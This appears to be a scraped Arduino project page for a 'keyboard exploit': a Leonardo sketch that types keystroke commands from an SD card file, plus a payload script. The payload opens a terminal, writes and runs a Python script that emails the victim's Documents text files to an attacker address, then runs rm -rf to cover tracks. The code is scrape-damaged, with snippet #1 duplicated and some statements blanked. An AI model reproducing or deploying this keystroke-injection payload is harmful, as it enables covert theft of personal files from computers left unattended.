Components and supplies
Pushbutton 3 pin (with resistor)
Arduino Leonardo
Sd card reader
Sd card
USB-A to Micro-USB Cable
Jumper wires (generic)
Project description
Code snippet #2
1- Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,tSleep::500 vi Sleep::300 Command::KEY_INSERT import smtplib import glob, os from os.path import expanduser from email.MIMEMultipart import MIMEMultipart from email.MIMEBase import MIMEBase from email.MIMEText import MIMEText from email.Utils import COMMASPACE, formatdate from email import Encoderssmtp_user = 'sender_gmail_address' smtp_pass = 'sender_gmail_password' to_address = 'receiver_address' scan_documents_location = 'Documents'subject = body = 'Files from hacked computer' header = 'To :{0} 2From : {1} 3Subject : {2} 4'.format(to_address, smtp_user, subject)def sendMail(to, subject, text, files=[]): msg = MIMEMultipart() msg['From'] = smtp_user msg['To'] = COMMASPACE.join(to) msg['Date'] = formatdate(localtime=True) msg['Subject'] = subject msg.attach(MIMEText(text)) for file in files: part = MIMEBase('application', "octet-stream") part.set_payload(open(file,"rb").read()) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(file)) msg.attach(part) server = smtplib.SMTP('') server.starttls() server.login(smtp_user, smtp_pass) server.sendmail(smtp_user, to, msg.as_string()) server.quit()sendMail([to_address], subject, body, glob.glob("{0}/{1}/*.txt".format(expanduser("~"), scan_documents_location))) Sleep::50 Command::KEY_ESC Sleep::100 :x Sleep::500 nohup python & Sleep::700 rm -rf Sleep::400 Command::KEY_LEFT_ALT,KEY_F
Code snippet #1
1#include "Keyboard.h" 2 3#include "SPI.h" 4#include "SD.h" 5 6String filenameOnCard = "hack.txt"; 7String sleepCommandStartingPoint = "Sleep::"; 8String commandStartingPoint = "Command::"; 9int delayBetweenCommands = 10; 10const int buttonPin = 8; 11const int chipSelect = 10; 12int previousButtonState = HIGH; 13 14void setup() { 15 pinMode(buttonPin, INPUT); 16 Serial.begin(9600); 17 Keyboard.begin(); 18 if (!SD.begin(chipSelect)) { 19 Serial.println("Card failed, or not present!"); 20 return; 21 } 22} 23 24void loop() { 25 int buttonState = digitalRead(buttonPin); 26 if ((buttonState != previousButtonState) && (buttonState == HIGH)) { 27 sdFileToKeyboard(); 28 Serial.println("Uploaded!"); 29 delay(500); 30 } 31 previousButtonState = buttonState; 32} 33 34void sdFileToKeyboard() { 35 File dataFile =; 36 if (!dataFile) { 37 Serial.println("The specified filename is not present on SD card, check filenameOnCard !"); 38 } 39 String line; 40 while (dataFile.available()) { 41 line = dataFile.readStringUntil('\n'); 42 Serial.println(line); 43 sendToKeyboard(line); 44 } 45 dataFile.close(); 46} 47 48void sendToKeyboard(String line) { 49 String workingLine = line; 50 if (workingLine.indexOf(sleepCommandStartingPoint) != -1) { 51 sleepFor(line); 52 return; 53 } 54 if (workingLine.indexOf(commandStartingPoint) == -1) { 55 Serial.print("Text:");Serial.println(line); 56 Keyboard.println(line); 57 pressEnter(); 58 return; 59 } 60 61 Serial.println("Command:"); 62 int charPosition = commandStartingPoint.length(); 63 int lineLength = line.length(); 64 workingLine += ","; 65 66 while (workingLine != "") { 67 workingLine = workingLine.substring(charPosition); 68 Serial.print("WorkingLine:");Serial.println(workingLine); 69 int specialCommandDelimiterPosition = workingLine.indexOf(","); 70 String command = workingLine.substring(0, specialCommandDelimiterPosition); 71 charPosition = specialCommandDelimiterPosition + 1; 72 if (command != "") { 73 Serial.print("Command found:");Serial.println(command); 74; 75 delay(delayBetweenCommands); 76 } 77 } 78 Keyboard.releaseAll(); 79 delay(delayBetweenCommands); 80} 81 82void pressEnter() { 83; 84 Keyboard.releaseAll(); 85} 86 87void sleepFor(String line) { 88 int sleepAmount = line.substring(sleepCommandStartingPoint.length(), line.length()).toInt(); 89 Serial.print("Sleeping for:");Serial.println(sleepAmount); 90 delay(sleepAmount); 91} 92 93char getCommandCode(String text) { 94 char textCharacters[2]; 95 text.toCharArray(textCharacters, 2); 96 char code = textCharacters[0]; 97 98 code = (text == "KEY_LEFT_CTRL") ? KEY_LEFT_CTRL : code; 99 code = (text == "KEY_LEFT_SHIFT") ? KEY_LEFT_SHIFT : code; 100 code = (text == "KEY_LEFT_ALT") ? KEY_LEFT_ALT : code; 101 code = (text == "KEY_UP_ARROW") ? KEY_UP_ARROW : code; 102 code = (text == "KEY_DOWN_ARROW") ? KEY_DOWN_ARROW : code; 103 code = (text == "KEY_LEFT_ARROW") ? KEY_LEFT_ARROW : code; 104 code = (text == "KEY_RIGHT_ARROW") ? KEY_RIGHT_ARROW : code; 105 code = (text == "KEY_RIGHT_GUI") ? KEY_RIGHT_GUI : code; 106 code = (text == "KEY_BACKSPACE") ? KEY_BACKSPACE : code; 107 code = (text == "KEY_TAB") ? KEY_TAB : code; 108 code = (text == "KEY_RETURN") ? KEY_RETURN : code; 109 code = (text == "KEY_ESC") ? KEY_ESC : code; 110 code = (text == "KEY_INSERT") ? KEY_INSERT : code; 111 code = (text == "KEY_DELETE") ? KEY_DELETE : code; 112 code = (text == "KEY_PAGE_UP") ? KEY_PAGE_UP : code; 113 code = (text == "KEY_PAGE_DOWN") ? KEY_PAGE_DOWN : code; 114 code = (text == "KEY_HOME") ? KEY_HOME : code; 115 code = (text == "KEY_END") ? KEY_END : code; 116 code = (text == "KEY_CAPS_LOCK") ? KEY_CAPS_LOCK : code; 117 code = (text == "KEY_F1") ? KEY_F1 : code; 118 code = (text == "KEY_F2") ? KEY_F2 : code; 119 code = (text == "KEY_F3") ? KEY_F3 : code; 120 code = (text == "KEY_F4") ? KEY_F4 : code; 121 code = (text == "KEY_F5") ? KEY_F5 : code; 122 code = (text == "KEY_F6") ? KEY_F6 : code; 123 code = (text == "KEY_F7") ? KEY_F7 : code; 124 code = (text == "KEY_F8") ? KEY_F8 : code; 125 code = (text == "KEY_F9") ? KEY_F9 : code; 126 code = (text == "KEY_F10") ? KEY_F10 : code; 127 code = (text == "KEY_F11") ? KEY_F1 : code; 128 code = (text == "KEY_F12") ? KEY_F2 : code;</p><p> return code; 129}
Code snippet #1
1#include "Keyboard.h" 2 3#include "SPI.h" 4#include "SD.h" 5 6String 7 filenameOnCard = "hack.txt"; 8String sleepCommandStartingPoint = "Sleep::"; 9String 10 commandStartingPoint = "Command::"; 11int delayBetweenCommands = 10; 12const int 13 buttonPin = 8; 14const int chipSelect = 10; 15int previousButtonState = 16 HIGH; 17 18void setup() { 19 pinMode(buttonPin, INPUT); 20 Serial.begin(9600); 21 22 Keyboard.begin(); 23 if (!SD.begin(chipSelect)) { 24 Serial.println("Card 25 failed, or not present!"); 26 return; 27 } 28} 29 30void loop() { 31 int 32 buttonState = digitalRead(buttonPin); 33 if ((buttonState != previousButtonState) 34 && (buttonState == HIGH)) { 35 sdFileToKeyboard(); 36 Serial.println("Uploaded!"); 37 38 delay(500); 39 } 40 previousButtonState = buttonState; 41} 42 43void sdFileToKeyboard() 44 { 45 File dataFile =; 46 if (!dataFile) { 47 Serial.println("The 48 specified filename is not present on SD card, check filenameOnCard !"); 49 } 50 51 String line; 52 while (dataFile.available()) { 53 line = dataFile.readStringUntil('\ 54'); 55 56 Serial.println(line); 57 sendToKeyboard(line); 58 } 59 dataFile.close(); 60} 61 62void 63 sendToKeyboard(String line) { 64 String workingLine = line; 65 if (workingLine.indexOf(sleepCommandStartingPoint) 66 != -1) { 67 sleepFor(line); 68 return; 69 } 70 if (workingLine.indexOf(commandStartingPoint) 71 == -1) { 72 Serial.print("Text:");Serial.println(line); 73 Keyboard.println(line); 74 75 pressEnter(); 76 return; 77 } 78 79 Serial.println("Command:"); 80 81 int charPosition = commandStartingPoint.length(); 82 int lineLength = line.length(); 83 84 workingLine += ","; 85 86 while (workingLine != "") { 87 workingLine 88 = workingLine.substring(charPosition); 89 Serial.print("WorkingLine:");Serial.println(workingLine); 90 91 int specialCommandDelimiterPosition = workingLine.indexOf(","); 92 String 93 command = workingLine.substring(0, specialCommandDelimiterPosition); 94 charPosition 95 = specialCommandDelimiterPosition + 1; 96 if (command != "") { 97 Serial.print("Command 98 found:");Serial.println(command); 99; 100 101 delay(delayBetweenCommands); 102 } 103 } 104 Keyboard.releaseAll(); 105 106 delay(delayBetweenCommands); 107} 108 109void pressEnter() { 110; 111 112 Keyboard.releaseAll(); 113} 114 115void sleepFor(String line) { 116 int sleepAmount 117 = line.substring(sleepCommandStartingPoint.length(), line.length()).toInt(); 118 Serial.print("Sleeping 119 for:");Serial.println(sleepAmount); 120 delay(sleepAmount); 121} 122 123char getCommandCode(String 124 text) { 125 char textCharacters[2]; 126 text.toCharArray(textCharacters, 2); 127 128 char code = textCharacters[0]; 129 130 code = (text == "KEY_LEFT_CTRL") 131 ? KEY_LEFT_CTRL : code; 132 code = (text == "KEY_LEFT_SHIFT") ? KEY_LEFT_SHIFT 133 : code; 134 code = (text == "KEY_LEFT_ALT") ? KEY_LEFT_ALT : code; 135 code 136 = (text == "KEY_UP_ARROW") ? KEY_UP_ARROW : code; 137 code = (text == "KEY_DOWN_ARROW") 138 ? KEY_DOWN_ARROW : code; 139 code = (text == "KEY_LEFT_ARROW") ? KEY_LEFT_ARROW 140 : code; 141 code = (text == "KEY_RIGHT_ARROW") ? KEY_RIGHT_ARROW : code; 142 code 143 = (text == "KEY_RIGHT_GUI") ? KEY_RIGHT_GUI : code; 144 code = (text == "KEY_BACKSPACE") 145 ? KEY_BACKSPACE : code; 146 code = (text == "KEY_TAB") ? KEY_TAB : code; 147 code 148 = (text == "KEY_RETURN") ? KEY_RETURN : code; 149 code = (text == "KEY_ESC") 150 ? KEY_ESC : code; 151 code = (text == "KEY_INSERT") ? KEY_INSERT : code; 152 code 153 = (text == "KEY_DELETE") ? KEY_DELETE : code; 154 code = (text == "KEY_PAGE_UP") 155 ? KEY_PAGE_UP : code; 156 code = (text == "KEY_PAGE_DOWN") ? KEY_PAGE_DOWN : 157 code; 158 code = (text == "KEY_HOME") ? KEY_HOME : code; 159 code = (text == 160 "KEY_END") ? KEY_END : code; 161 code = (text == "KEY_CAPS_LOCK") ? KEY_CAPS_LOCK 162 : code; 163 code = (text == "KEY_F1") ? KEY_F1 : code; 164 code = (text == "KEY_F2") 165 ? KEY_F2 : code; 166 code = (text == "KEY_F3") ? KEY_F3 : code; 167 code = (text 168 == "KEY_F4") ? KEY_F4 : code; 169 code = (text == "KEY_F5") ? KEY_F5 : code; 170 171 code = (text == "KEY_F6") ? KEY_F6 : code; 172 code = (text == "KEY_F7") 173 ? KEY_F7 : code; 174 code = (text == "KEY_F8") ? KEY_F8 : code; 175 code = (text 176 == "KEY_F9") ? KEY_F9 : code; 177 code = (text == "KEY_F10") ? KEY_F10 : code; 178 179 code = (text == "KEY_F11") ? KEY_F1 : code; 180 code = (text == "KEY_F12") 181 ? KEY_F2 : code;</p><p> return code; 182}
Downloadable files
Fritzing schematic
Fritzing schematic
Fritzing schematic
Fritzing schematic
Fritzing schematic image
Fritzing schematic image
Arduino repository
The sketch is inside projects/keyboard_exploit
Arduino repository
The sketch is inside projects/keyboard_exploit
Fritzing schematic image
Fritzing schematic image
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